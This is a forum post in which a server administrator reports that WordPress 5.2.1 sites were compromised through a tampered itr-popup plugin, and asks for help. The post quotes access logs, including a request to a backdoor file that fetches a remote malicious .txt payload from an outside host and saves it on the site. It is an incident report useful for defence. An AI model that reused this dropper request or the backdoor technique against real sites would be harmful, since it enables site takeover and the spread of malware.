Hello there,
I’m managing some servers and I’ve figured out some WordPress sites (from different clients and different developers) are hacked a few days after their installations.
But, the hacking methods are completely similar to each other. This is what will happen:
1. A User logs into WordPress on his first try (seems that there is not any brute force attacks).
2. The logged in user uploads a plugin named itr-popup.
Here is the logs:
202.58.105.15 - - [23/May/2019:06:41:41 +0430] "GET /wp-login.php HTTP/1.0" 200 3944 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0.1) Gecko/20100101 Firefox/4.0.1"
202.58.105.15 - - [23/May/2019:06:41:31 +0430] "HEAD /wp-login.php HTTP/1.0" 200 570 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0"
202.58.105.15 - - [23/May/2019:06:41:45 +0430] "POST /wp-login.php HTTP/1.0" 302 1293 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0"
202.58.105.15 - - [23/May/2019:06:41:47 +0430] "GET /wp-admin/ HTTP/1.0" 200 127945 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0"
202.58.105.15 - - [23/May/2019:06:41:56 +0430] "GET /wp-admin/plugin-install.php?tab=upload HTTP/1.0" 200 81558 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0"
202.58.105.15 - - [23/May/2019:06:42:09 +0430] "GET /wp-content/plugins/itr-popup/scripts/jscolor/itro-admin-scripts.php HTTP/1.0" 200 5813 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0"
202.58.105.15 - - [23/May/2019:06:42:03 +0430] "POST /wp-admin/update.php?action=upload-plugin HTTP/1.0" 200 51039 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0"
3. This plugin contains a file named itro-admin-scripts.php. This file accepts two parameters:
– url: Which is the url of a txt file that contains a malicious codes.
– dir: Where to save this malware on the victim site.
With this method, the hacker uploads any files he/she wants on the website and use them to hack other websites as well.
This is the logs of the way the hacker uploaded the scripts:
51.15.180.50 - - [23/May/2019:11:08:32 +0430] "GET /wp-content/plugins/itr-popup/scripts/jscolor/itro-admin-scripts.php?url=http://nataliehaley.kage-tora.com/wp.txt&dir=wp-content/plugins/itr-popup/scripts/jscolor HTTP/1.0" 200 1047 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
Both sites that this happened to them were using WordPress 5.2.1 and they made sure that they did not install this itr-popup plugin on their WordPress website.
Please note that they are different clients, different developers on different servers.
I even downloaded this plugin from WordPress repository and it was clean and itro-admin-scripts.php file which I said the hacker used it to upload malwares on the websites, is not included in the original version downloaded from WordPress.org. So, I believe that it’s not a problem with this plugin.
I didn’t find any similar attack reports on the internet. Anyone else having the same issue here? I worry if it’s some kind of a bug in WordPress 5.2.1 itself.
Thank you for your help.
Iman